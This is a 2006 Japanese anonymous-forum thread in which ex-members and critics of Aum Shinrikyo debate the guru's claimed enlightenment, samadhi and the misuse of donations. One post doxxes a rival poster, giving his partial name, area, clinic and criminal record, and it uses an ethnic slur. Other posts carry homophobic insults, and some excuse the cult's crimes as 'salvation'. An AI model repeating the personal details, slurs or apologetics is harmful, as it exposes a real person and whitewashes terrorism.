>漏れは布施がしたくて、徳がつみたくて、今できる楽しみを
>押さえて、節約して布施したさ
>なんでもかんでも金もては、喜んで布施しにいったさ
>そんでなんだよ?
>バカファミリが使い込むのか?
>働きもしないで、ヘタクソな絵の貸し出し料で月に40マンかよ??
>人を馬鹿にするのもいい加減にしな?

安心しる!
キャンディが布施をしていた10年前は、御家族の無駄遣いや奥方による絵の貸出はまだ無かったからw

119 :名無しさん@3周年:2006/10/11(水) 22:11:32 ID:VcM7JnHY
解脱を説く宗教は、願望の放棄を説くよ
願望が、その人を不幸にし、生まれ変わらせるから
欲望から解き放たれたものが、永遠の安らぎを得る
あんたらのとうちゃんは、いい加減だったしバカだったが
この教えを、広めようとしていたのは確かだった

しかるに、このバカガキどもは、やってくれたんだよ
知子がいけない
さすがに、アチャリは20だからな、一存でそんな買い物できないだろう、、

人には、願望の放棄を説いたんだ
若い頃にそれを聞いて、まに受けた私は悩んだ
自分が将来こうなりたい、あの人と結婚したい
そういう欲望が、自分に形状を取らせ(欲が無ければ非形状という高い世界に生まれる)
下の世界に結びつけると
そういう教えの前に、自分の世俗のコセコセした願望は
小さいと思わせた、、
しかるに、なんだこのザマは?
あれがしたいの、これじゃないと嫌だのと、

120 :阿佐谷北本人:2006/10/11(水) 22:13:48 ID:Z9rcxE2K
>>104 間違ってないと?

教義自体は間違っているとは言えない。仏教だし、尤もらしい宗教理論が書いてありますよ。
オウムの書籍には、通常使われている仏教用語との対応表がオマケに付いていた。





121 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 22:15:19 ID:OAY3xraV
>>111
>外側だけしか見ないなら、確かに「快楽殺人者」にしか見えない罠w

いえいえ。一度内側に居たからこその言葉ですよ。あなたこそ外側しか見えてませんね^^

>申し訳ないが、私は教祖のエネルギーを直接体験した事がある。
>「見た」「感じた」というレベルではなく、私の変化身か何かが直接教祖のエネルギーの中に入って体験した次第。
それまでの私自身のイメージや観念を遥かに凌ぐあまりの凄まじさに驚いた物です。
私は徹底的に否定的で且つエネルギーの下降傾向が極めて強いサマナでしたので、全く予期していない出来事にただ呆然とした物です。

その程度は他の教団や団体でも経験しますよ^^これをもって麻原を肯定するのは薄いです。

>「シヴァの喜び」氏は公開の場でのサマディを重要視していらっしゃいますが、それを頻繁に行っても所詮パイロット・ババ辺りのレベルでしょ?
 正直言って、教祖のエネルギーはそんな物とは比較にならないと思います。
>「シヴァの喜び」氏がそれを全く感じられなかったのは、幾ら教祖と縁が深くても、本当の意味で「教祖に意識が向いていなかった」からでは無いでしょうか?

いえいえ。
そのババジーでさえも33時間の水中サマディを含む100回以上の公開サマディをしていますよ^^
最終解脱などという仰々しいものをしているならばもっと凄いことして示さないと^^
でも、まあ、公開サマディでいいと言ってるんです。
俺はババジーのエネルギー注入も受けたことあります。その二つを比べて言ってることですよ。
言って置きますがそれは俺が一番麻原に帰依していた頃のことです。名前を受け後継者などということまで言われたすぐ後の話ですね^^
だから、あなたの言葉はこれで否定されます。

>功徳が有るのに霊性がそれほど高くなかったのも、その原因かと思われますが。

おやおや。徳が無く霊性が高いって言ってみたり、その逆を言ってみたり忙しいなw
俺の霊性の高さは麻原が見出し(その力は少々あったことは認めます)ババジーも認め(それでインドに連れて
帰ろうとしました)いろいろなリンポチェにも確認してありますよ。
まあ、意門が普通の人に比べて発達しているだけってものですがね。


122 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/11(水) 22:15:51 ID:Ro91ucjv
>>115
>私は教団のホムペにメール入れたが
>あいつらバカにしているのか、一度も返事をよこさないぜ?
>なんのために、ご意見うかがいのホムペ作ったんだよ?

昔から教団は、自分達に都合の悪い意見は封殺する傾向がありますわな。
私も貴方と全く同じ事をして、やはり黙殺された事がありました。
もっとも、一度は正悟師までメールが上がり、直接正悟師からメールの内容について電話を頂いた事もありましたけど。


123 :名無しさん@3周年:2006/10/11(水) 22:17:06 ID:VcM7JnHY
はく流のブログでみたけど、ゲイカたちは、アルバイトのつもりなのか
信者にイニをほどこしておやりだとか?

まあ、本当に宗教活動ができるのであれば、教団の援助を受けるのも
理が通るかもしれないが
まだ、子供で、自分で判断できてないと思うね
しかも、ファミコンで遊んでいる子供のイニが、そんなにいいものかどうか、、

知子が、こどもらの教団での権威を高めたくてさせているんだろうな?
本当にしているとすれば

124 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 22:17:50 ID:OAY3xraV
>>120

仏教なのに真我常住説?
はい。この段階で仏教ではあり得ませんよ^^
もちろんヨガでもない。

125 :阿佐谷北本人:2006/10/11(水) 22:20:45 ID:Z9rcxE2K
>>104

 導師が居なくなる、導師を置かないなどと言ったと同時に、
ここの修行には欠けが生じてしまう。その教義体系に無理が出てくるよ。

 オウムが提起していた 正しい宗教 の条件をも欠いてしまう。

 つまり、自分たちの団体は、正しい宗教ではなくなってしまうっていう
ことだよ。笑いごとではないのだが、そういうことだ。自家撞着とはまさにこれだろう。

 在家信者との約束事もほとんど破棄されている。
信者のための墓地建設、医療サポート、等々、、裏切りの一例を挙げればそういうことだ。

126 :阿佐谷北本人:2006/10/11(水) 22:22:08 ID:Z9rcxE2K
>>124 真我常住説?

 良いんじゃないの、宗教理論はいろいろだから。


127 :阿佐谷北本人:2006/10/11(水) 22:25:51 ID:Z9rcxE2K
>>124 この段階で仏教ではあり得ませんよ

 そんなことは無いですよ。笑
ま、その調子で他の団体も当たれば、利益が無いことは無いでしょう。
ただ、俺の調べでは、どこも宗教理論に関しての論争は避けるケースが多いようだし、
命を狙われることもある。

 特にキリスト教徒の団体や、某団体には、相当な嫌がらせのノウハウがあることが知られている。



128 :名無しさん@3周年:2006/10/11(水) 22:25:53 ID:VcM7JnHY
ようするに知子は、ガキドモは外で生活させてやりたくても
できないと、思っているんだろうな?
学校くらいは行かせてやれても、就職なんかできないよね?
それに比べたら、
教団の中で、子供の地位を確立したほうが、まだ生き残れると、、いうことか?
しかし、実子が後を継ぐのは世間にはばかりがあるということで
離してあったんじゃないのかね

129 :阿佐谷北本人:2006/10/11(水) 22:32:21 ID:Z9rcxE2K
>>124 この段階で仏教ではあり得ませんよ

 良いんじゃないの、宗教理論はいろいろだから。


 それに、オウムの宗教理論は完成してはいなかった様だよ。

 オウム教団は 完成された完全な絶対な導師 を大前提としている。
それを基礎に組み上げられている宗教理論だから、導師の見解でどうにでも修正されてしまう宗教理論のようですよ。
その基本線しか公にはされていないようだ。

 完成された完全な絶対な導師 を大前提にした基本線の部分は、
まぁ、間違っているとは言えないだろう。俺はそう思う。


130 :名無しさん@3周年:2006/10/11(水) 22:33:43 ID:tumynWrk
質問者:何でサマナは道場ではあいさつしてくれなかったんですか?

M派サマナ:教祖に、こんにちはとかのあいさつはしてはいけないと教えられたんです。
こんにちはとかの代わりにご修行どうですか?というのを言いなさいと。

質問者:えー?、ご修行どうですか、なんてほとんど聞いたことないですけど。
ブスーッと黙って座っている。そんな人が多かったですけど

M派サマナ:それはあなたの感じ方なんじゃないですか?

質問者:私は事実を言ってるんです!

・・・・・ダミダこりゃ

131 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/11(水) 22:40:38 ID:Ro91ucjv
>>121
> いえいえ。一度内側に居たからこその言葉ですよ。あなたこそ外側しか見えてませんね^^
>
何か大きな勘違いしてらっしゃる様ですが、その「内側」とは「教団の内側」の事であり、教祖を外側から見ている点では全く変わり有りませんよw
私の言う「内側」とは、教祖の五蘊の内側の意味です。

>その程度は他の教団や団体でも経験しますよ^^これをもって麻原を肯定するのは薄いです。
>
その貴方のイメージしている「経験」と私の体験とでは、大きな隔たりがあると思います。
私はその体験により教祖のエネルギーの巨大さ・広大さを感じると共に、変化身ごと意識を「ポア」をされた訳です。

>いえいえ。
>そのババジーでさえも33時間の水中サマディを含む100回以上の公開サマディをしていますよ^^
>最終解脱などという仰々しいものをしているならばもっと凄いことして示さないと^^
>でも、まあ、公開サマディでいいと言ってるんです。
>
 教祖は、或る意味「もっと凄い事」を示してらっしゃるのですけどねw
 それは、現象を極めて客観的に読み取る能力がないと分からない事ですけど。


132 :阿佐谷北本人:2006/10/11(水) 22:42:44 ID:Z9rcxE2K
>>104

 如何に立派で、完璧な教義であっても、
その実態が 裏切りOk では、教義を議論することは まったく無意味 だ。

 しかも書籍では、(教祖や自分たち出家は)絶対に裏切らない とまで言い切っている始末だ。
諸々の事実から、裏切りは明白。従って、教義を云々しても無意味だろうということだな。

 すべてが導師次第、何故なら完全で絶対だから、、、そんな教義もここの特徴である。
本尊が完全で、導師も完全、説かれる教えも完全、、、そんな理屈だろう。

 ここは浅原の言いなり、浅原次第の教義だと、
オウムウォッチャー諸氏もそんな風に言っているようだけれども、俺もそうだと思う。


余談だが、、
 書籍では、キリスト教や英語教育を否定していたはずだよ、オウムは。
これも実態と合わない。出鱈目だ。



133 :名無しさん@3周年:2006/10/11(水) 22:44:00 ID:VcM7JnHY
漏れは、フラメンコが習いたいと、いったことがある
そんなことしてどうするの、という師の返事でしたよ
てか、そんな話をオウムに言ってする私がいけないのだが
何か話すとそんな調子でしたから、
大学いきたいの、マンション欲しいの、言われてすぐそのとおりにしてやる
教団に、すっかり嫌気がさしましたよ

あたしにいったことと、実子に言っていることはずいぶん違いますな
信者はATMですからね
せっかく稼いだ給料を、くだらん習い事に使うより
セミナでも受けて、教団に金落としてほしいんだろ、、

134 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/11(水) 22:44:32 ID:Ro91ucjv
>>121

>俺はババジーのエネルギー注入も受けたことあります。その二つを比べて言ってることですよ。
>言って置きますがそれは俺が一番麻原に帰依していた頃のことです。名前を受け後継者などということまで言われたすぐ後の話ですね^^
>だから、あなたの言葉はこれで否定されます。
>
 私にはこの様に両者を比較できる体験はありませんから、この話は非常に参考になります。
 「シヴァの喜び」氏は、パイロット・ババのエネルギーに波長が合ってらっしゃったのですね。
 その時に教祖を捨ててパイロット・ババに帰依をする気は起きなかったのでしょうか?

>おやおや。徳が無く霊性が高いって言ってみたり、その逆を言ってみたり忙しいなw
>
各々のレスの中で使用している「徳」・「霊性」の意味や内容がそれぞれ違いますからね。
「シヴァの喜び」氏はある程度霊性が高くて教祖と縁があるという意味では「徳が高い」のですが、
救済意欲が低い上に智恵に直結する霊性が足りないが為に、教祖の救済活動に付いて行く為の「功徳」が少なく感じられた次第です。
不躾な指摘をしてしまって、申し訳有りませんが。

>俺の霊性の高さは麻原が見出し(その力は少々あったことは認めます)ババジーも認め(それでインドに連れて
>帰ろうとしました)いろいろなリンポチェにも確認してありますよ。
>まあ、意門が普通の人に比べて発達しているだけってものですがね。
>
 でも教祖の能力を見誤ったと。救済活動を(事件も含めて)理解出来なかったと。
 その点が非常に惜しいな、と感じますね。

>>125-127
以前散々論破されたくせに、相変わらずの電波だなw
前と何一つ代わり映えの無いのがキチガイの証拠ですね。


135 :名無しさん@3周年:2006/10/11(水) 22:47:04 ID:tumynWrk
質問者:被害者だけでなく、多額の布施をしてあんな事件を起こされた
    元信者達にも謝罪し、賠償したらどうですか?

M派サマナ:その方々は納得してお布施したのだから別にいいんじゃ
      ありませんか?

質問者:本当に納得していると思っているのですか!ハルマゲドンなど
    デタラメな予言に多額の金をつぎこんで、納得できるとお思いですか!

M派サマナ:・・・・・・・・

ダミダ こりゃ!



136 :阿佐谷北本人:2006/10/11(水) 22:47:07 ID:Z9rcxE2K
>>104

 絶対、完全、この言葉を多用する団体だよ、オウムは。

 そしてその意味というものを理解している者は、極一部の人たちだし、
今となっては戦争体験者位のものかも知れない。

 絶対という語の意味を分かっていながら、宗教の看板を掲げ、
非を認めない人間に宗教を語る資格は無い。


137 :名無しさん@3周年:2006/10/11(水) 22:47:52 ID:VcM7JnHY
私はギタリストが好きだが
ギターが弾けたら天にいけるのかとあんたら言いましたね
なんでも、私が好きなものは否定しますよね

でも、アチャリがいえば、マンションだって買ってきますからね
他人の名義まで使ってナ、、アホラシ
なんでも好きなことしているわけだ
信者にはとやかく言っておいて、、


138 :阿佐谷北本人:2006/10/11(水) 22:52:52 ID:Z9rcxE2K
>>104

  絶対、完全、極限、、、こうした語の意味をもう一度考えてご覧。

このスレは閉めて、オウム事件をもう一度考えるスレ に場を移すべきだな。

139 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/11(水) 22:59:09 ID:Ro91ucjv
>>74
YK氏へ
教団でもネタにされたそうだが、”ペンタゴン・レポート”でググッってみて下さい。
現在、そして近い将来のアメリカが何を考えてどう行動するのかが、垣間見えると思いますよ。

140 :名無しさん@3周年:2006/10/11(水) 22:59:32 ID:tumynWrk
質問者:え?M派にあのスガ○ダさんがいらっしゃるのですか!

M派サマナ:はい、そうです。

質問者:あの人暗かったですよね。あいさつもしてくれなかったなあ

M派サマナ:そんなことないですよ。人それぞれの感じ方でしょう

質問者:みんなの声なんですが!それともみんなの声というのは
    聞く耳ありませんか?参考にさえできません?

M派サマナ:・・・・・・・

あ〜ダミダこりゃ


141 :名無しさん@3周年:2006/10/11(水) 23:02:16 ID:DJN29oSA
>>134 >各々のレスの中で使用している「徳」・「霊性」の意味や内容がそれぞれ違いますからね
厳密に言葉の定義をしないでコロコロ変えるなんざ只の屁理屈だろ!!論理でも何でもないよ。

142 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/11(水) 23:13:13 ID:Ro91ucjv
>>49
>グルであろうと間違っているならば正す。
>これが出来なかったから我々はおかしくなったのだ。ニンマやカギュにはキチンと
>「グルと仏典と言ってることが対立するならばグルを正せ」
>と説いている。

教祖は、マイトレーヤ正大師やプンナ正悟師に対してはそういう「グルを諌める」役割を期待していた節が有る。
実際にマイトレーヤ正大師などは教祖を諌めて逆に誉められた経験を語ったそうで。
プンナ正悟師も、多生意味合いは違えども教祖から「何故私を止めないんだ!今、私を止められるのはお前だけなのに!」と言われた事が有ったそうです。
しかるに事件の時期は、教祖の周囲には教祖を盲従して「順縁の偽」を行う弟子ばかりが集まり、「逆縁の真」を行う弟子が全く居なくなってしまっていた。
それであの結果が生じました。

>>55
>もどきに聞いてみて。
>教団にマーラが居なかったか。

 教祖は「サマナの間には悪魔が飛び交っている」と申していましたがw

>人間の生命力を滋養にしている存在がいなかったか。
>
 それって悪魔の定義なの??

143 :名無しさん@3周年:2006/10/11(水) 23:17:28 ID:CmyLimwy
>121
ババジーとはパイロットババのことですか?

144 :名無しさん@3周年:2006/10/11(水) 23:17:46 ID:VcM7JnHY
キムチ食ったらトウモが起きた

145 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/11(水) 23:21:40 ID:Ro91ucjv
>>141
徳や霊性の高低なぞ、それを見る(または感じる)人の視点の位置(またはステージ)によってコロコロ変わる相対的な物に過ぎないが?
だから、普通の人は文脈からその言葉が何を差しているかをその都度理解する訳です。
逆に頭の悪い人はそれが理解出来ないから、相対的な物に対して「厳密な言葉の定義」などを求めてくる訳ですねw



146 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/11(水) 23:27:00 ID:Ro91ucjv
以下、このスレを荒らしている「無印:阿佐谷北(偽者)」のプロフです。
この電波男はわたくし「阿佐谷北(本物) ◆Kcjlum1seI 」とは別人ですので、くれぐれもお間違えなきようお願い致します。

------------------------------------------------------
【HN】 阿佐谷北(トリップ無し) asagayakita 阿佐ヶ谷北 京王線沿線住民
【本名】苗字は「石田」 名前は「むね○」らしい
【年齢】昭和三十年代生まれ(自白) 現在42-51歳 
    千葉市の検見川(朝鮮部落)・稲毛周辺に実家あり
【経歴】無職(生活保護申請は却下) 前科あり(現在も警察に所在確認をされていると自白)
    自称元オウム在家信者 カルト宗教ハレークリシュナ元信者(完全追放された模様)
    鬱病患者(稲毛駅前の○塚クリニックに通っていたと自白)
    老人ホームでの僅かなボランティア歴を誇らしげに語る
【趣味】2ちゃんねる荒らし ジャズ喫茶・漫画喫茶通い カルト宗教通い
    オウム教義叩き オウム担当警察官・NHK職員の情報収集 ヤクザ映画鑑賞
【出没地】稲毛 中央線沿線の漫画喫茶(ゲラゲラ他)ジャズ喫茶(四谷いーぐる他)
     新宿署 京橋フィルムセンター ラピュタ阿佐ヶ谷
【天敵】警察官・刑事 公務員(都庁職員・福祉課課長・図書館職員等) テレ朝職員 東大
    全共闘世代 キリスト教徒 騙り 刺青をした外国人 帰国子女 ビートルズ
    創価学会 


147 :名無しさん@3周年:2006/10/11(水) 23:30:10 ID:DJN29oSA
>>145
相対尺度を基準にした論理なぞ屁理屈

148 :阿佐谷北本人:2006/10/11(水) 23:36:39 ID:Z9rcxE2K
 絶対、完全、極限、すべて、、こうした語の意味をもう一度考えてご覧。

 そしてその意味というものを理解している者は、極一部の人たちだろう。

 そうした言葉を口にする人は多いが、真に理解しているのは、
(現代の日本社会では)博打で生活している人か、戦争体験者位のものではなかろうか。

 絶対という語の意味を理解していながら、宗教の看板を掲げ続け、
自分の非を認めない人間は詐欺師だ。彼らに宗教を語る資格は無い。

149 :阿佐谷北本人:2006/10/11(水) 23:38:38 ID:Z9rcxE2K
>>146

 その「無印:阿佐谷北(偽者)」のプロフは迷惑なんだよ。
貴様も同じ穴の狢だろうが、俺の言葉を理解できるならば、即刻止めよ。

150 :名無しさん@3周年:2006/10/12(木) 00:32:12 ID:Q292vMhC
上祐、村岡、野田、二ノ宮、杉浦兄弟は遺族被害者に直接謝罪しろ!!
特に野田は桃源事件被害者へだ!!


151 :名無しさん@3周年:2006/10/12(木) 00:33:43 ID:51ZYqjDa
>>135
ソースは何ですか?
まあ、M派も案の定、他人の痛みの解らない似非修行者ってことですな
世間の風当たりが強いから、長いものには巻かれろですかね
そうだとするとA派よりタチが悪い
そうでなくとも、ロクなもんじゃない


152 :名無しさん@3周年:2006/10/12(木) 00:59:05 ID:51ZYqjDa
かつて崇め帰依した麻原に反旗翻すならば、過去の過ちは過ちと認めたらどうなんだ
自分達が生き延びさえすればいいのかい?
世間をナメルナヨ。元信徒をナメルナヨ
そういう姑息で自己チュウな態度は、すぐに見ぬかれるだろう
何が改革だよ、少し世渡りの巧い同じ穴のムジナじゃないかい???

153 :名無しさん@3周年:2006/10/12(木) 01:02:08 ID:57sJqU3+
>>121
> 名前を受け後継者などということまで言われた

アナル売りのホモ野郎がペド豚の後継者とは、ほんとにお似合いだよ(笑)

154 :名無しさん@3周年:2006/10/12(木) 01:15:07 ID:z8ZWKLS3
>>153
アナル売りのホモ野郎

それを言ったら終わりだよwww
可愛そうだからやめなさい、いいね?www

155 :名無しさん@3周年:2006/10/12(木) 01:26:58 ID:Th7eZiVr
教祖はバイ

156 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 01:37:46 ID:1QTbK4Ru
>>131
>何か大きな勘違いしてらっしゃる様ですが、その「内側」とは「教団の内側」の事であり、教祖を外側から見ている点では全く変わり有りませんよw
私の言う「内側」とは、教祖の五蘊の内側の意味です。

それが出来るってことは君は解脱してるってことになるけど?


>その貴方のイメージしている「経験」と私の体験とでは、大きな隔たりがあると思います。
私はその体験により教祖のエネルギーの巨大さ・広大さを感じると共に、変化身ごと意識を「ポア」をされた訳です。

それを証明することはできる?
麻原がサマディを証明できないとその言葉は無意味ですよ^^
それが為せるって証明がサマディ^^


>教祖は、或る意味「もっと凄い事」を示してらっしゃるのですけどねw

それはなにかな?
サマディこそは最高の証明だよ。それは成就者でないと入れないからね。
それ以外は証明にはならない。
っていうかこれが最高だよ。

>それは、現象を極めて客観的に読み取る能力がないと分からない事ですけど。

いや。それは君でしょ?麻原ありきで話を進めてるもの。
その前に麻原を疑って、で、反証していかないと。
それが正しい現実の客観的見方ってやつでしょうに。
100億歩ゆずって麻原が解脱者だったとして、俺みたいな懐疑的な人間にはやはりサマディで示さなきゃw
できないならやはり解脱してないと断じられて当然でしょ?

157 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 01:52:50 ID:1QTbK4Ru
>>134
>私にはこの様に両者を比較できる体験はありませんから、この話は非常に参考になります。
「シヴァの喜び」氏は、パイロット・ババのエネルギーに波長が合ってらっしゃったのですね。
その時に教祖を捨ててパイロット・ババに帰依をする気は起きなかったのでしょうか?

ですから、この時は一番麻原に帰依してた時期です^^
「一番意識が俺に向いてる」と麻原に言われてた時期でしたよ^^
あなたの論で言えば波長は麻原に向いてる時期ですなwもちろんババジーにはこの時は
帰依など起こしていません。

>各々のレスの中で使用している「徳」・「霊性」の意味や内容がそれぞれ違いますからね。
「シヴァの喜び」氏はある程度霊性が高くて教祖と縁があるという意味では「徳が高い」のですが、
救済意欲が低い上に智恵に直結する霊性が足りないが為に、教祖の救済活動に付いて行く為の「功徳」が少なく感じられた次第です。
不躾な指摘をしてしまって、申し訳有りませんが。

いえいえ。全て否定できますので^^
たんにあなたの言葉遊びで言い逃れに過ぎないって^^
麻原がほんとに解脱者ならそんな魂に一時的にでも「後継者」の話はしないと思いますよ^^
それに徳が足りないのは麻原でしょうに。今の状況を見れば分ります^^
救済というものをホントに考えるなら長きに渡って活動できることが良いはずです。
急激な変化(上昇)は急激な変化(下降)を生みます。これはこの世の理。彼はそんなことさえ分らなかった。
だから救済も嘘っぱちですし、解脱はありえません。

>でも教祖の能力を見誤ったと。救済活動を(事件も含めて)理解出来なかったと。 その点が非常に惜しいな、と感じますね。

いえいえ。
俺は正確に見えてますよ^^
だから、この世の理(色即是空 空即是色。何が言いたいか分りますよね?)さえよく理解できていなかった
麻原が解脱している訳はありませんよ^^事件は彼が自分の欲の為にやったのです^^

158 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 01:59:02 ID:1QTbK4Ru
>>142
>教祖は、マイトレーヤ正大師やプンナ正悟師に対してはそういう「グルを諌める」役割を期待していた節が有る。
実際にマイトレーヤ正大師などは教祖を諌めて逆に誉められた経験を語ったそうで。
プンナ正悟師も、多生意味合いは違えども教祖から「何故私を止めないんだ!今、私を止められるのはお前だけなのに!」と言われた事が有ったそうです。
しかるに事件の時期は、教祖の周囲には教祖を盲従して「順縁の偽」を行う弟子ばかりが集まり、「逆縁の真」を行う弟子が全く居なくなってしまっていた。
それであの結果が生じました。

都合のいい解釈です。
解脱者なら自分で止まればいいのです。自分で自分を止められないのは解脱者とは言いません。
それにこれは「誰も俺を止めることなどできない」ということの確認に過ぎないように思われる
エピソードです。




>教祖は「サマナの間には悪魔が飛び交っている」と申していましたがw

ふむ。ということはやはりいたんだな。
それは麻原に憑いていたものでしょうね。

>それって悪魔の定義なの??

いえ。最近知った事例にそのようなマーラが存在してたということがあったので
聞いてみただけです。
いろんなタイプがいるようで、怒りを滋養にしてるヤツとかね。
で、修行者を怒らせてエネルギーを吸う。


159 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 02:02:43 ID:1QTbK4Ru
>>145
>徳や霊性の高低なぞ、それを見る(または感じる)人の視点の位置(またはステージ)によってコロコロ変わる相対的な物に過ぎないが?

ではそんなものを話の中に持ち込むのをやめた方がいいですよ^^
あなたはすぐそこに行くから鏡返ししてるだけです^^

>だから、普通の人は文脈からその言葉が何を差しているかをその都度理解する訳です。
逆に頭の悪い人はそれが理解出来ないから、相対的な物に対して「厳密な言葉の定義」などを求めてくる訳ですねw

その頭の悪い人にちゃんと理解できるように話ができない、自己満足の言葉を連ねることが頭がいいとは到底思えないですが?^^


160 :名無しさん@3周年:2006/10/12(木) 02:08:52 ID:51ZYqjDa
オウム・麻原は大口叩くが中身が伴なわない
挙句の果てに苦し紛れの言い訳が多かったな

弟子の為にシャクティパットやり過ぎて間違ってパイロットババに師事したw
本当は空中浮揚できるが、神足通の根っこダルドリー以上はやらないw
神通は見世物じゃないwと言いながらオカルト雑誌に売名してるw
弟子の為にエネルギーロスして神通発揮できないw
シャクティパットやってアストラルが濁って予言間違えたw
弟子のカルマ受けてサマディできないw

161 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 02:10:49 ID:1QTbK4Ru
>>153
> アナル売りのホモ野郎がペド豚の後継者とは、ほんとにお似合いだよ(笑)

残念。
その後継者にはならなかったのだからw君の言葉は意味を成さないw
そんなことよりもその口汚い言葉で君が何を得るのかを考えると可哀想だよ。



>>154
>それを言ったら終わりだよwww 可愛そうだからやめなさい、いいね?www

全然傷つかないし、可哀想でもないよ^^
君たちの方が可哀想。人の過去を笑うものに未来はない。
その人なりに必死で生きてきた時間を笑うものは自分の未来の時間に意味など持てないだろうから。
個人攻撃や嘲りを為すものが正しかったことが歴史上一度でも正しかったことはないよ^^
そんなあなた方に哀れみを。


162 :名無しさん@3周年:2006/10/12(木) 02:26:23 ID:51ZYqjDa
洗脳された弟子達は、尊師は救済の為に身を粉にして健康を害してる
とか、自分達の為に、、とか、都合よく解釈してしまう。
詐欺師麻原の思う壺なわけだ
そして、麻原のウソ、言い逃れに、だーれも突っ込み入れない
オウム・アーレフは欺瞞に満ちているのよ


163 :名無しさん@3周年:2006/10/12(木) 03:08:13 ID:L2Wf3aC+
オウムの中でサマディに入った経験がある人は、
かなり多いといえる。
特にカッピナ師はサマディの経験が豊富であり、
意図的に心臓を止めるのも得意であった。
しかし、そのカッピナ師でも、
他の人と交流がある普通の生活をするようになってからは、
サマディに入りにくくなった。
これはエネルギーロスが生じるからである。

つまり、エネルギー移入をしながら、
サマディに入ることは至難の技で、
非常に難しいといえる。

164 :名無しさん@3周年:2006/10/12(木) 03:11:54 ID:L2Wf3aC+
尊師はサマディに入れないから、
解脱していないと批判する者がいるが、
弟子がサマディに入っていれば、
グルとして何ら問題はないと思う。

オウムでは極限修行中にサマディに入るということが、
かなり普通にあった。
これは尊師のグルとしての力量が高いことを示す。
尊師以外に、弟子をサマディに入れることができるグルはいるのだろうか?
今生きている、人間で、
そのようなグルがいるとしたら、
紹介してほしいものだ。

165 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 03:53:11 ID:1QTbK4Ru
>>163
>オウムの中でサマディに入った経験がある人は、かなり多いといえる。
特にカッピナ師はサマディの経験が豊富であり、意図的に心臓を止めるのも得意であった。
しかし、そのカッピナ師でも、他の人と交流がある普通の生活をするようになってからは、
サマディに入りにくくなった。これはエネルギーロスが生じるからである。

却下。
心臓を意図的に止めるのは凄い禅定の力だとは思うけどそれでサマディとは言えない。
サマディは少なくとも第4禅以上の世界なので実はここからの禅定は壊れません。
これは仏典にも説明があります。
なので他人との関わりでエネルギーロスすることは認めるけどサマディに入れなくなるのは
ありえない。
よって彼の禅定は非常に高いレベルものではあるけどサマディではない。
それにサマディへの道は経験を落としていく道なので経験させていくオウムの道は真逆の道です。
なのでサマディには至れない。



>つまり、エネルギー移入をしながら、サマディに入ることは至難の技で、非常に難しいといえる。

サマディに入れない俺でさえ、自分のできるとこまで深く入って出てくると心身ともにリフレッシュされるのに
それができないならそれはサマディではないでしょw
解脱者がサマディでチャージできないなら何でエネルギーチャージするのさw


166 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 04:12:35 ID:1QTbK4Ru
>>164
>尊師はサマディに入れないから、解脱していないと批判する者がいるが、弟子がサマディに入っていれば、グルとして何ら問題はないと思う。

ほい。 大問題w
よしんばそれば真にサマディだとしてもそれはその人のサマディであってグルのものではない。
釈迦ムニもことあるごとにサマディは示されてるよね? それが必要なのでは?グル麻原にもw

>オウムでは極限修行中にサマディに入るということが、かなり普通にあった。 これは尊師のグルとしての力量が高いことを示す。

ほい。却下。
認識が止まったという体験をした人がいなかった。よってサマディではない。
極限修行では、成就の判定を「体験」に依ってたからね。真にサマディならそれは「体験がない」 って体験になるはずだから。
よしんばサマディだったとしてそれはその人のサマディであって麻原のものではない。
麻原は己は正しいというなら自らで証明しなければならなかった。でもできなかった。
それは解脱していないから。こう断じられて当然である。自らの正しさは自らが証明し続けなければならないから。

>尊師以外に、弟子をサマディに入れることができるグルはいるのだろうか?
今生きている、人間で、そのようなグルがいるとしたら、紹介してほしいものだ

いっぱいいるよ。君たちが目を開こうとしないだけ。
インドヒマラヤヨーギーに、チベット仏教に、テーラヴァーダ仏教に。
ちと君の間違いを正しておくけど、誰もサマディへは弟子を入れられないよ。
彼ら成就者は言うよ。
「サマディは自ら赴くもの。誰かに与えられるものではない。そしてそれはやってくるもの。入ろうとして入れるものではない。
準備の整った者にだけ訪れるもの。だからサマディへは一人になる必要がある。静かに待つために。
一旦それに入れば、その扉の開け方はおのずと分ってくる」
だから麻原の言うような「サマディに入れる」とか「解脱を与える」は嘘っぱち。
それは準備が整ってるものに訪れる。グルとはその準備の整え方を教えるものですよ。与えるものではない。

167 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 04:17:13 ID:1QTbK4Ru
>>165

その意図的の心臓止めるってやつ、俺でもやれるよw少々の時間ならね(計測したことないからわからないけど1分くらいかも)
サマディともなると例えばある聖者の14日間ってのがあるけど・・それがサマディレベルなんですが?
短いものならある程度の身体操作の能力を磨けば可能な領域ですな。

168 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 04:24:27 ID:1QTbK4Ru
>第4禅以上の世界なので実はここからの禅定は壊れません。

これって麻原も説明してたはずだな。古い説法で。
ここからは瞑想中に現われるニミッタが完全に固定されるので禅定が不壊になると
仏典にも説明されるけど・・・。
それが分っていなかったんだな。麻原。

169 :名無しさん@3周年:2006/10/12(木) 05:31:50 ID:35izoQdn
チヅオの死刑執行って、いつ頃行われるんですかね。

170 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/12(木) 05:47:27 ID:3F+U+9Wb
>>168
>これって麻原も説明してたはずだな。古い説法で。
>ここからは瞑想中に現われるニミッタが完全に固定されるので禅定が不壊になると
>仏典にも説明されるけど・・・。
>それが分っていなかったんだな。麻原。

 第四静慮以上に到達すると、エネルギーをロスしても禅定が壊れなくなるのですか?



171 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/12(木) 07:07:10 ID:3F+U+9Wb
>>149
「同じ穴の狢」?何のこっちゃw
再掲
--------------------------------------------------
